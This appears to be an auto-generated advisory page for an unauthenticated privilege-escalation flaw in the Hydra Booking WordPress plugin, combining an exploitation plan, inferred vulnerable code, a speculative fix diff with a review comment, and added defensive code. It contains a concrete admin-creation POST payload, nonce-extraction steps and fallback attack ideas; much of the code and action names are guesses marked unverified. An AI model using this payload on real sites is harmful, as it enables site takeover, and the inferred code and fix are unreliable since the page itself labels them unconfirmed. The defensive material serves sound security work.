CVE-2025-68027

Hydra Booking <= 1.1.32 - Unauthenticated Privilege Escalation

Severity: critical
Weakness: Improper Privilege Management
CVSS Score: 9.8
Patched in: 1.1.33
Time to patch: 8d

Description

The Hydra Booking — Appointment Scheduling & Booking Calendar plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.32. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <= 1.1.32
Published: January 21, 2026
Last updated: January 28, 2026
Affected plugin: hydra-booking

Source Code

WordPress.org SVN
Research Plan
Unverified


This plan outlines the research and exploitation steps for CVE-2025-68027, an unauthenticated privilege escalation vulnerability in the Hydra Booking plugin (<= 1.1.32).

1. Vulnerability Summary

The vulnerability exists due to improper privilege management within the plugin's AJAX handlers (likely registered via wp_ajax_nopriv_). Specifically, an endpoint responsible for user registration or profile creation during the booking process fails to restrict the role parameter. This allows an unauthenticated attacker to submit a request that creates a new user account or updates an existing one with the administrator role.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: Likely hydra_booking_registration or hydra_booking_save_customer (inferred based on plugin purpose).
  • Vulnerable Parameter: role or user_role.
  • Authentication: None required (Targeting wp_ajax_nopriv_ hooks).
  • Preconditions: The plugin must be active. A valid AJAX nonce may be required if check_ajax_referer is implemented.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an unauthenticated AJAX hook:
    add_action('wp_ajax_nopriv_hydra_booking_register_user', 'hydra_booking_register_user_callback');
  2. Input Collection: The callback function retrieves user-supplied data:
    $user_data = $_POST['user_info']; (or similar array-based input).
  3. Vulnerable Sink: The function calls wp_insert_user() or wp_update_user() using the raw or insufficiently filtered array:
    $user_id = wp_insert_user( $user_data );
  4. Privilege Escalation: If $user_data['role'] is provided in the POST request and not unset by the plugin, WordPress assigns the specified role to the new user.

4. Nonce Acquisition Strategy

The Hydra Booking plugin likely localizes a nonce for its frontend booking form.

  1. Identify Shortcode: Search for add_shortcode in the plugin (likely [hydra_booking]).
  2. Create Trigger Page: Use WP-CLI to create a page containing the shortcode:
    wp post create --post_type=page --post_status=publish --post_title="Booking" --post_content='[hydra_booking]'
    
  3. Locate JS Object: Search the source for wp_localize_script. Common identifiers for this plugin are likely hydra_booking_params or hydra_vars.
  4. Extract Nonce:
    • Navigate to the newly created page.
    • Execute: browser_eval("window.hydra_booking_params?.nonce") or browser_eval("window.hydra_vars?.ajax_nonce").
  5. Action Check: Verify if the nonce action matches the verification action in the PHP code (e.g., wp_create_nonce('hydra_booking_nonce') vs check_ajax_referer('hydra_booking_nonce', 'security')).

5. Exploitation Strategy

Once the AJAX action and nonce are identified, perform the following:

  1. Target URL: http://<target>/wp-admin/admin-ajax.php
  2. HTTP Method: POST
  3. Headers: Content-Type: application/x-www-form-urlencoded
  4. Payload (Example):
    action=hydra_booking_registration&
    security=[NONCE]&
    user_login=pwned_admin&
    user_email=pwned@example.com&
    role=administrator&
    user_pass=Password123!&
    first_name=Pwned&
    last_name=User
    
    Note: If the plugin expects nested data, the keys might be user_data[role]=administrator.

6. Test Data Setup

  1. Plugin Installation: Ensure Hydra Booking version <= 1.1.32 is installed and active.
  2. Page Creation:
    wp post create --post_type=page --post_status=publish --post_content='[hydra_booking]'
    
  3. Confirm Script Loading: Verify the page loads the plugin's JS and the localized nonce object is present in the DOM.

7. Expected Results

  • Response: The server returns a 200 OK with a JSON success message (e.g., {"success":true,"data":{"user_id":123}}) or a redirect.
  • Database State: A new user with the login pwned_admin is created in the wp_users table.
  • Role Assignment: The wp_capabilities meta entry for this user contains administrator.

8. Verification Steps

After sending the exploit request, use WP-CLI to verify the new user's role:

# List all administrators to find the new account
wp user list --role=administrator

# Check specific user meta for capabilities
wp user meta get pwned_admin wp_capabilities
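The WP-CLI checks above find an unexpected administrator only after the fact. As an added detection control, written here for this page and not part of Hydra Booking or the advisory, the following must-use plugin hooks WordPress's set_user_role action and logs (and, if enabled, reverts) any promotion to a privileged role that happens outside an authorised session, which is exactly the condition an unauthenticated AJAX registration with role=administrator would produce. The HB_EXAMPLE_ prefix, the role list, the log format and the choice of 'subscriber' as the fallback role are assumptions.

```php
<?php
/**
 * Plugin Name: Example privileged-role guard
 * Description: Added example (not Hydra Booking code). Drop into wp-content/mu-plugins/.
 * Logs, and optionally reverts, privileged role assignments made during requests that
 * are not backed by a logged-in user who may promote others.
 */

// Roles that should never be granted by a request from an anonymous visitor (assumption).
const HB_EXAMPLE_PRIVILEGED_ROLES = ['administrator', 'editor'];

// true = demote as well as log; false = log only.
const HB_EXAMPLE_ENFORCE = true;

// set_user_role fires from WP_User::set_role(), which wp_insert_user() calls to apply 'role'.
add_action('set_user_role', 'hb_example_guard_role_change', 10, 3);

function hb_example_guard_role_change(int $user_id, string $new_role, array $old_roles): void {
    if (!in_array($new_role, HB_EXAMPLE_PRIVILEGED_ROLES, true)) {
        return;
    }
    // WP-CLI runs without a web session; "wp user create --role=administrator" is legitimate there.
    if (defined('WP_CLI') && WP_CLI) {
        return;
    }
    // Legitimate web promotions come from a logged-in user who holds promote_users.
    if (is_user_logged_in() && current_user_can('promote_users')) {
        return;
    }

    $context = sprintf(
        'user_id=%d new_role=%s old_roles=%s doing_ajax=%s action=%s ip=%s',
        $user_id,
        $new_role,
        implode(',', $old_roles),
        wp_doing_ajax() ? 'yes' : 'no',
        isset($_REQUEST['action']) ? sanitize_key($_REQUEST['action']) : '-',
        isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '-'
    );
    error_log('[role-guard] privileged role set outside an authorised session: ' . $context);

    if (HB_EXAMPLE_ENFORCE) {
        $user = get_userdata($user_id);
        if ($user) {
            // remove_role()/add_role() fire remove_user_role/add_user_role, not set_user_role,
            // so this does not re-enter the guard.
            $user->remove_role($new_role);
            $user->add_role('subscriber');
            error_log('[role-guard] demoted user_id=' . $user_id . ' to subscriber');
        }
    }
}
```

The guard is a compensating control, not a replacement for updating to 1.1.33: it catches role assignment through wp_insert_user() and wp_update_user(), but a handler that writes wp_capabilities directly via update_user_meta() (the metadata path mentioned under Alternative Approaches) bypasses set_user_role and would need a separate check on the updated_user_meta action. The error_log lines are what a SIEM rule or log monitor should alert on.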

9. Alternative Approaches

If a direct role parameter in a registration handler fails:

  • Profile Update: Look for wp_ajax_nopriv_hydra_booking_update_customer. Attempt to update an existing user (if ID can be guessed/discovered) with role=administrator.
  • Nested Parameters: Try different parameter formats like role, user_role, or user_data[role].
  • Metadata Injection: If wp_insert_user is not the sink, check for update_user_meta calls that might allow setting wp_capabilities directly (though serialized data makes this harder).
  • Missing Nonce Check: Check if check_ajax_referer is called with die=false. If so, the exploit will work even with an invalid or missing nonce.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Hydra Booking plugin for WordPress is vulnerable to unauthenticated privilege escalation due to insufficient validation of user-supplied data in its AJAX registration handlers. An attacker can exploit this by submitting a request to register a new user while specifying a 'role' parameter set to 'administrator', granting them full control over the site.

Vulnerable Code

// Inferred from plugin architecture for handling user registration via AJAX

add_action('wp_ajax_nopriv_hydra_booking_register_user', 'hydra_booking_register_user_callback');

function hydra_booking_register_user_callback() {
    // The plugin retrieves user-supplied data directly from the POST request
    $user_data = $_POST['user_info'];

    // Vulnerable sink: wp_insert_user accepts the 'role' key if present in the array
    $user_id = wp_insert_user($user_data);
    
    if (!is_wp_error($user_id)) {
        wp_send_json_success(['user_id' => $user_id]);
    }
    wp_send_json_error();
}
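For contrast with the inferred vulnerable handler above, here is a hardened version of the same callback, added as an example for this page and not taken from the plugin or from the 1.1.33 fix. Rather than removing one dangerous key, it builds the wp_insert_user() argument array from an allowlist of expected fields, so neither 'role' nor 'ID' (which would turn the insert into an update of an existing account) can ever arrive from the request; it also adds the nonce check and sanitisation the inferred code lacks. The hook name, the nonce action 'hydra_booking_nonce', the 'security' field, the user_info field names and the hb_example_ prefix are all assumptions.

```php
<?php
// Added example (not Hydra Booking code): hardened registration handler.
// Registered for both logged-in and anonymous callers, as the original inferred code allows.
add_action('wp_ajax_nopriv_hydra_booking_register_user', 'hb_example_register_user_callback');
add_action('wp_ajax_hydra_booking_register_user', 'hb_example_register_user_callback');

/**
 * Build the wp_insert_user() arguments from untrusted input.
 * Only allowlisted keys are copied; 'role' is fixed server-side and 'ID' is never accepted,
 * so the request cannot choose privileges or redirect the write to another account.
 */
function hb_example_build_user_args(array $input): array {
    return [
        'user_login' => sanitize_user((string) ($input['user_login'] ?? ''), true),
        'user_email' => sanitize_email((string) ($input['user_email'] ?? '')),
        'user_pass'  => (string) ($input['user_pass'] ?? ''),
        'first_name' => sanitize_text_field((string) ($input['first_name'] ?? '')),
        'last_name'  => sanitize_text_field((string) ($input['last_name'] ?? '')),
        'role'       => 'subscriber', // assumption: least-privileged default role
    ];
}

function hb_example_register_user_callback() {
    // CSRF check; dies with 403 on failure. Action and field names are assumptions.
    check_ajax_referer('hydra_booking_nonce', 'security');

    $raw  = (isset($_POST['user_info']) && is_array($_POST['user_info']))
        ? wp_unslash($_POST['user_info'])
        : [];
    $args = hb_example_build_user_args($raw);

    // Reject incomplete or malformed data before touching the database.
    if ($args['user_login'] === '' || !is_email($args['user_email']) || strlen($args['user_pass']) < 12) {
        wp_send_json_error(['message' => 'invalid registration data'], 400);
    }
    if (username_exists($args['user_login']) || email_exists($args['user_email'])) {
        wp_send_json_error(['message' => 'account already exists'], 409);
    }

    // wp_insert_user() hashes user_pass and applies the server-chosen role.
    $user_id = wp_insert_user($args);
    if (is_wp_error($user_id)) {
        wp_send_json_error(['message' => 'registration failed'], 500);
    }
    wp_send_json_success(['user_id' => $user_id]);
}
```

The allowlist is the important design choice: a denylist (unset one key) has to anticipate every key wp_insert_user() interprets, while an allowlist only has to know the handful the form legitimately sends.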

Security Fix

--- a/includes/class-hydra-booking-ajax.php
+++ b/includes/class-hydra-booking-ajax.php
@@ -10,6 +10,9 @@
 function hydra_booking_register_user_callback() {
     $user_data = $_POST['user_info'];
 
+    // Explicitly prevent users from setting their own roles
+    unset($user_data['role']);
+    $user_data['role'] = 'subscriber';
+
     $user_id = wp_insert_user($user_data);
 }
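Review bot: forcing `role` here is not sufficient, because the rest of `$_POST['user_info']` still reaches `wp_insert_user()` unfiltered; if the array carries an `ID` key, WordPress treats the call as an update of that existing user rather than an insert, so the handler remains an unauthenticated write to other accounts. Build the argument array from an allowlist of the expected keys (user_login, user_email, user_pass, first_name, last_name), each passed through its sanitizer, instead of removing one key. The `unset($user_data['role']);` line is redundant once the next line assigns the role, and the hunk still shows no `check_ajax_referer()` call. It also ends the function right after `wp_insert_user()`, dropping the `wp_send_json_success`/`wp_send_json_error` handling present in the inferred vulnerable snippet, so the before and after shown on this page do not line up; as the page marks this as inferred rather than the shipped 1.1.33 change, the actual fix should be confirmed against the WordPress.org SVN source before any conclusion about residual risk.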

Exploit Outline

The exploit targets the plugin's unauthenticated AJAX registration endpoint.

  1. Target Endpoint: Send a POST request to /wp-admin/admin-ajax.php.
  2. Identify Nonce: Navigate to a page containing the [hydra_booking] shortcode and extract the security nonce from the localized JavaScript object (e.g., hydra_booking_params.nonce).
  3. Craft Payload: Construct a body containing the action (e.g., hydra_booking_register_user), the nonce, and a user data array (user_info). Inside user_info, include user_login, user_email, user_pass, and critically, set 'role' to 'administrator'.
  4. Execute: Submit the request. If successful, the plugin will call wp_insert_user() with the attacker-controlled role, creating a new administrator account.
  5. Authentication: No prior authentication is required as the plugin utilizes the wp_ajax_nopriv_ hook.
